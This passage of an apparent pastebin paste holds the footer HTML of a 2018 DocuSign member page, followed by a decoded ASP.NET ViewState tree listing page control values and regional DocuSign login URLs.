  4363.                                    <div title="Portuguese (Brasil)" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-pt_BR');return CE(event);" onmousedown="MasterPageAction('setlang-pt_BR')" onkeydown="MasterPageAction('setlang-pt_BR')">Português (Brasil)</div>
  4364.                                </td>
  4365.                                <td>
  4366.                                    <div title="Russian" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-ru');return CE(event);" onmousedown="MasterPageAction('setlang-ru')" onkeydown="MasterPageAction('setlang-ru')">Русский</div>
  4367.                                </td>
  4368.                            </tr>
  4369.                            <tr>
  4370.                                <td>
  4371.                                    <div title="Spanish" class="ActionMenuItem" ontouchstart="if (window.BtnCancelMD) { window.BtnCancelMD(this);}" ontouchend="MasterPageAction('setlang-es');return CE(event);" onmousedown="MasterPageAction('setlang-es')" onkeydown="MasterPageAction('setlang-es')">Español</div>
  4372.                                </td>
  4373.                        </table>
  4374.                    </div>
  4375.                </div>
  4376.                <div id="ds_divLanguageSelected" onkeyup="OpenMasterPageMenu(&#39;divLanguageMenuItems&#39;,&#39;divLanguageMenu&#39;, &#39;ActionMenuShowUp&#39;);" onmouseup="OpenMasterPageMenu(&#39;divLanguageMenuItems&#39;,&#39;divLanguageMenu&#39;, &#39;ActionMenuShowUp&#39;);" style="padding-right: 10px; white-space: nowrap; text-align: center;">
  4377.                    English (US) <img src="img/btn_arrow_u.png" style="vertical-align:middle;" border="0" alt="Up Arrow" />
  4378.                </div>
  4379.            </div>
  4380.            <script>
  4381.                function linkClick_TermsOfUse() {
  4382.                    window.open('http://www.docusign.com/company/terms-of-use/lang/en', 'TermsOfUse');
  4383.                    return false;
  4384.                }
  4385.            </script><a tabindex='0' id="TermsOfUse" onclick="linkClick_TermsOfUse()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_TermsOfUse();}}" class="FooterLink" href='javascript:void(0);'>Terms Of Use</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  4386.            <script>
  4387.                function linkClick_CorporateSupport() {
  4388.                    window.open('https://www.docusign.com/support', 'CorporateSupport');
  4389.                    return false;
  4390.                }
  4391.            </script><a tabindex='0' id="CorporateSupport" onclick="linkClick_CorporateSupport()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_CorporateSupport();}}" class="FooterLink" href='javascript:void(0);'>Support</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  4392.            <script>
  4393.                function linkClick_Feedback() {
  4394.                    window.open('http://community.docusign.com/t5/Feedback/ct-p/feedback', 'Feedback');
  4395.                    return false;
  4396.                }
  4397.            </script><a tabindex='0' id="Feedback" onclick="linkClick_Feedback()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_Feedback();}}" class="FooterLink" href='javascript:void(0);'>Feedback</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  4398.            <script>
  4399.                function linkClick_IntellectualProp() {
  4400.                    window.open('http://www.docusign.com/IP/lang/en', 'IntellectualProp');
  4401.                    return false;
  4402.                }
  4403.            </script><a tabindex='0' id="IntellectualProp" onclick="linkClick_IntellectualProp()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_IntellectualProp();}}" class="FooterLink" href='javascript:void(0);'>Intellectual Property</a><span>&nbsp;&nbsp;&nbsp;|&nbsp;&nbsp;&nbsp;</span>
  4404.            <script>
  4405.                function linkClick_PrivacyPolicy() {
  4406.                    window.open('http://www.docusign.com/company/privacy-policy/lang/en', 'PrivacyPolicy');
  4407.                    return false;
  4408.                }
  4409.            </script><a tabindex='0' id="PrivacyPolicy" onclick="linkClick_PrivacyPolicy()" onkeypress="if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){linkClick_PrivacyPolicy();}}" class="FooterLink" href='javascript:void(0);'>Privacy Policy</a><span>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Copyright © 2018 DocuSign, Inc. All rights reserved.</span>
  4410.  
  4411.  
  4412.            <div class="SctClr"></div>
  4413.  
  4414.        </div>
  4415.        <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js" integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script>
  4416.        <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js" integrity="sha384-cs/chFZiN24E4KMATLdqdvsezGxaGsi4hLGOzlXwp5UZB1LY//20VyM2taTB4QvJ" crossorigin="anonymous"></script>
  4417.        <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js" integrity="sha384-uefMccjFJAIv6A+rW+L4AHf99KvxDjWSu1z9VI8SKNVmz4sk7buKt/6v9KI65qnm" crossorigin="anonymous"></script>
  4418.  
  4419.  
  4420.        <script type="text/javascript">
  4421.            //<![CDATA[
  4422.            if (self != top) {
  4423.                window.popped = true;
  4424.                var pm = document.getElementById('popmsg');
  4425.                if (pm) {
  4426.                    pm.innerHTML = "Please check for the new window that has popped with your document open.  If the window has been blocked by a pop-up blocker, please click Start DocuSign to continue.";
  4427.                } else {
  4428.                    var bdy = document.getElementsByTagName('body');
  4429.                    if (bdy) bdy[0].style.display = 'none';
  4430.                }
  4431.                window.open('https://www.docusign.net/member/janraindisplay.aspx');
  4432.            } //]]>
  4433.        </script>
  4434.    </form>
  4435.  
  4436.  
  4437.  
  4438.  
  4439. </body>
  4440.  
  4441.  
  4442.  
  4443. </html>
  4444.  
  4445. PAIR
  4446.      First: PAIR
  4447.            First: 1437778861 (System.String)
  4448.            Second: PAIR
  4449.                  First: ARRAYLIST
  4450.                        (0) OTHER - System.Web.UI.IndexedString
  4451.                        (1) 27a70612b0924c3698db1b374a6009c0 (System.String)
  4452.                  Second: ARRAYLIST
  4453.                        (0) 0 (System.Int32)
  4454.                        (1) PAIR
  4455.                              First: NODE IS NULL
  4456.                              Second: ARRAYLIST
  4457.                                    (0) 2 (System.Int32)
  4458.                                    (1) PAIR
  4459.                                          First: NODE IS NULL
  4460.                                          Second: ARRAYLIST
  4461.                                                (0) 1 (System.Int32)
  4462.                                                (1) PAIR
  4463.                                                      First: PAIR
  4464.                                                            First: ARRAYLIST
  4465.                                                                  (0) OTHER - System.Web.UI.IndexedString
  4466.                                                                  (1) False (System.Boolean)
  4467.                                                            Second: NODE IS NULL
  4468.                                                      Second: NODE IS NULL
  4469.                                                (2) 3 (System.Int32)
  4470.                                                (3) PAIR
  4471.                                                      First: NODE IS NULL
  4472.                                                      Second: ARRAYLIST
  4473.                                                            (0) 7 (System.Int32)
  4474.                                                            (1) PAIR
  4475.                                                                  First: NODE IS NULL
  4476.                                                                  Second: ARRAYLIST
  4477.                                                                        (0) 1 (System.Int32)
  4478.                                                                        (1) PAIR
  4479.                                                                              First: PAIR
  4480.                                                                                    First: ARRAYLIST
  4481.                                                                                          (0) OTHER - System.Web.UI.IndexedString
  4482.                                                                                          (1) False (System.Boolean)
  4483.                                                                                    Second: NODE IS NULL
  4484.                                                                              Second: ARRAYLIST
  4485.                                                                                    (0) 1 (System.Int32)
  4486.                                                                                    (1) PAIR
  4487.                                                                                          First: ARRAYLIST
  4488.                                                                                                (0) OTHER - System.Web.UI.IndexedString
  4489.                                                                                                (1) False (System.Boolean)
  4490.                                                                                          Second: NODE IS NULL
  4491.                                                                                    (2) 3 (System.Int32)
  4492.                                                                                    (3) PAIR
  4493.                                                                                          First: NODE IS NULL
  4494.                                                                                          Second: ARRAYLIST
  4495.                                                                                                (0) 1 (System.Int32)
  4496.                                                                                                (1) PAIR
  4497.                                                                                                      First: ARRAYLIST
  4498.                                                                                                            (0) OTHER - System.Web.UI.IndexedString
  4499.                                                                                                            (1) Set account as default (System.String)
  4500.                                                                                                      Second: NODE IS NULL
  4501.                                                                                    (4) 7 (System.Int32)
  4502.                                                                                    (5) PAIR
  4503.                                                                                          First: NODE IS NULL
  4504.                                                                                          Second: ARRAYLIST
  4505.                                                                                                (0) 3 (System.Int32)
  4506.                                                                                                (1) PAIR
  4507.                                                                                                      First: NODE IS NULL
  4508.                                                                                                      Second: ARRAYLIST
  4509.                                                                                                            (0) 0 (System.Int32)
  4510.                                                                                                            (1) PAIR
  4511.                                                                                                                  First: ARRAYLIST
  4512.                                                                                                                        (0) OTHER - System.Web.UI.IndexedString
  4513.                                                                                                                        (1) return upgradeClick(); (System.String)
  4514.                                                                                                                        (2) OTHER - System.Web.UI.IndexedString
  4515.                                                                                                                        (3) (System.String)
  4516.                                                                                                                        (4) OTHER - System.Web.UI.IndexedString
  4517.                                                                                                                        (5) NODE IS NULL
  4518.                                                                                                                        (6) OTHER - System.Web.UI.IndexedString
  4519.                                                                                                                        (7) if(event){if(typeof(IsEnterOrSpaceKey)!=='undefined'&&IsEnterOrSpaceKey(event)){return upgradeClick();}} (System.String)
  4520.                                                                                                                        (8) OTHER - System.Web.UI.IndexedString
  4521.                                                                                                                        (9) True (System.Boolean)
  4522.                                                                                                                        (10) OTHER - System.Web.UI.IndexedString
  4523.                                                                                                                        (11) Btnsecondary (System.String)
  4524.                                                                                                                  Second: NODE IS NULL
  4525.                                                                                    (6) 9 (System.Int32)
  4526.                                                                                    (7) PAIR
  4527.                                                                                          First: ARRAYLIST
  4528.                                                                                                (0) OTHER - System.Web.UI.IndexedString
  4529.                                                                                                (1) False (System.Boolean)
  4530.                                                                                          Second: NODE IS NULL
  4531.                                                                                    (8) 13 (System.Int32)
  4532.                                                                                    (9) PAIR
  4533.                                                                                          First: ARRAYLIST
  4534.                                                                                                (0) OTHER - System.Web.UI.IndexedString
  4535.                                                                                                (1) Logout (System.String)
  4536.                                                                                          Second: NODE IS NULL
  4537.                                                                        (2) 5 (System.Int32)
  4538.                                                                        (3) PAIR
  4539.                                                                              First: PAIR
  4540.                                                                                    First: ARRAYLIST
  4541.                                                                                          (0) OTHER - System.Web.UI.IndexedString
  4542.                                                                                          (1) False (System.Boolean)
  4543.                                                                                    Second: NODE IS NULL
  4544.                                                                              Second: ARRAYLIST
  4545.                                                                                    (0) 1 (System.Int32)
  4546.                                                                                    (1) PAIR
  4547.                                                                                          First: PAIR
  4548.                                                                                                First: ARRAYLIST
  4549.                                                                                                      (0) OTHER - System.Web.UI.IndexedString
  4550.                                                                                                      (1) False (System.Boolean)
  4551.                                                                                                Second: NODE IS NULL
  4552.                                                                                          Second: NODE IS NULL
  4553.                                                                                    (2) 3 (System.Int32)
  4554.                                                                                    (3) PAIR
  4555.                                                                                          First: PAIR
  4556.                                                                                                First: ARRAYLIST
  4557.                                                                                                      (0) OTHER - System.Web.UI.IndexedString
  4558.                                                                                                      (1) False (System.Boolean)
  4559.                                                                                                Second: NODE IS NULL
  4560.                                                                                          Second: NODE IS NULL
  4561.                                                                                    (4) 4 (System.Int32)
  4562.                                                                                    (5) PAIR
  4563.                                                                                          First: PAIR
  4564.                                                                                                First: ARRAYLIST
  4565.                                                                                                      (0) OTHER - System.Web.UI.IndexedString
  4566.                                                                                                      (1) False (System.Boolean)
  4567.                                                                                                Second: NODE IS NULL
  4568.                                                                                          Second: NODE IS NULL
  4569.                                                                                    (6) 5 (System.Int32)
  4570.                                                                                    (7) PAIR
  4571.                                                                                          First: PAIR
  4572.                                                                                                First: ARRAYLIST
  4573.                                                                                                      (0) OTHER - System.Web.UI.IndexedString
  4574.                                                                                                      (1) False (System.Boolean)
  4575.                                                                                                Second: NODE IS NULL
  4576.                                                                                          Second: NODE IS NULL
  4577.                                                                                    (8) 9 (System.Int32)
  4578.                                                                                    (9) PAIR
  4579.                                                                                          First: PAIR
  4580.                                                                                                First: ARRAYLIST
  4581.                                                                                                      (0) OTHER - System.Web.UI.IndexedString
  4582.                                                                                                      (1) False (System.Boolean)
  4583.                                                                                                Second: NODE IS NULL
  4584.                                                                                          Second: NODE IS NULL
  4585.                                                                        (4) 7 (System.Int32)
  4586.                                                                        (5) PAIR
  4587.                                                                              First: PAIR
  4588.                                                                                    First: ARRAYLIST
  4589.                                                                                          (0) OTHER - System.Web.UI.IndexedString
  4590.                                                                                          (1) False (System.Boolean)
  4591.                                                                                    Second: NODE IS NULL
  4592.                                                                              Second: ARRAYLIST
  4593.                                                                                    (0) 1 (System.Int32)
  4594.                                                                                    (1) PAIR
  4595.                                                                                          First: ARRAYLIST
  4596.                                                                                                (0) OTHER - System.Web.UI.IndexedString
  4597.                                                                                                (1) False (System.Boolean)
  4598.                                                                                          Second: NODE IS NULL
  4599.                                                                                    (2) 3 (System.Int32)
  4600.                                                                                    (3) PAIR
  4601.                                                                                          First: ARRAYLIST
  4602.                                                                                                (0) OTHER - System.Web.UI.IndexedString
  4603.                                                                                                (1) False (System.Boolean)
  4604.                                                                                          Second: NODE IS NULL
  4605.                                                                                    (4) 9 (System.Int32)
  4606.                                                                                    (5) PAIR
  4607.                                                                                          First: ARRAYLIST
  4608.                                                                                                (0) OTHER - System.Web.UI.IndexedString
  4609.                                                                                                (1) False (System.Boolean)
  4610.                                                                                          Second: NODE IS NULL
  4611.                                                                                    (6) 15 (System.Int32)
  4612.                                                                                    (7) PAIR
  4613.                                                                                          First: NODE IS NULL
  4614.                                                                                          Second: ARRAYLIST
  4615.                                                                                                (0) 1 (System.Int32)
  4616.                                                                                                (1) PAIR
  4617.                                                                                                      First: ARRAYLIST
  4618.                                                                                                            (0) OTHER - System.Web.UI.IndexedString
  4619.                                                                                                            (1) Set account as default (System.String)
  4620.                                                                                                      Second: NODE IS NULL
  4621.                                                                                    (8) 21 (System.Int32)
  4622.                                                                                    (9) PAIR
  4623.                                                                                          First: ARRAYLIST
  4624.                                                                                                (0) OTHER - System.Web.UI.IndexedString
  4625.                                                                                                (1) Logout (System.String)
  4626.                                                                                          Second: NODE IS NULL
  4627.                                                                        (6) 9 (System.Int32)
  4628.                                                                        (7) PAIR
  4629.                                                                              First: PAIR
  4630.                                                                                    First: ARRAYLIST
  4631.                                                                                          (0) OTHER - System.Web.UI.IndexedString
  4632.                                                                                          (1) False (System.Boolean)
  4633.                                                                                    Second: NODE IS NULL
  4634.                                                                              Second: NODE IS NULL
  4635.                                                                        (8) 11 (System.Int32)
  4636.                                                                        (9) PAIR
  4637.                                                                              First: NODE IS NULL
  4638.                                                                              Second: ARRAYLIST
  4639.                                                                                    (0) 1 (System.Int32)
  4640.                                                                                    (1) PAIR
  4641.                                                                                          First: NODE IS NULL
  4642.                                                                                          Second: ARRAYLIST
  4643.                                                                                                (0) 3 (System.Int32)
  4644.                                                                                                (1) PAIR
  4645.                                                                                                      First: TRIPLET
  4646.                                                                                                            First: PAIR
  4647.                                                                                                                  First: ARRAYLIST
  4648.                                                                                                                        (0) OTHER - System.Web.UI.IndexedString
  4649.                                                                                                                        (1) True (System.Boolean)
  4650.                                                                                                                  Second: NODE IS NULL
  4651.                                                                                                            Second: PAIR
  4652.                                                                                                                  First: ARRAYLIST
  4653.                                                                                                                        (0) 0 (System.Int32)
  4654.                                                                                                                        (1) 1 (System.Int32)
  4655.                                                                                                                        (2) 2 (System.Int32)
  4656.                                                                                                                        (3) 3 (System.Int32)
  4657.                                                                                                                  Second: ARRAYLIST
  4658.                                                                                                                        (0) TRIPLET
  4659.                                                                                                                              First: NA1 (System.String)
  4660.                                                                                                                              Second: https://www.docusign.net/Member/JanrainDisplay.aspx (System.String)
  4661.                                                                                                                              Third: True (System.Boolean)
  4662.                                                                                                                        (1) TRIPLET
  4663.                                                                                                                              First: NA2 (System.String)
  4664.                                                                                                                              Second: https://na2.docusign.net/Member/JanrainDisplay.aspx (System.String)
  4665.                                                                                                                              Third: True (System.Boolean)
  4666.                                                                                                                        (2) TRIPLET
  4667.                                                                                                                              First: NA3 (System.String)
  4668.                                                                                                                              Second: https://na3.docusign.net/Member/JanrainDisplay.aspx (System.String)
  4669.                                                                                                                              Third: True (System.Boolean)
  4670.                                                                                                                        (3) TRIPLET
  4671.                                                                                                                              First: EU (System.String)
  4672.                                                                                                                              Second: https://eu.docusign.net/Member/JanrainDisplay.aspx (System.String)
  4673.                                                                                                                              Third: True (System.Boolean)
  4674.                                                                                                            Third: NODE IS NULL
  4675.                                                                                                      Second: NODE IS NULL
  4676.                                                (4) 7 (System.Int32)
  4677.                                                (5) PAIR
  4678.                                                      First: ARRAYLIST
  4679.                                                            (0) OTHER - System.Web.UI.IndexedString
  4680.                                                            (1) (System.String)
  4681.                                                      Second: NODE IS NULL
  4682.                                                (6) 9 (System.Int32)
  4683.                                                (7) PAIR
  4684.                                                      First: PAIR
  4685.                                                            First: ARRAYLIST
  4686.                                                                  (0) OTHER - System.Web.UI.IndexedString
  4687.                                                                  (1) False (System.Boolean)
  4688.                                                            Second: NODE IS NULL
  4689.                                                      Second: NODE IS NULL
  4690.      Second: NODE IS NULL
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement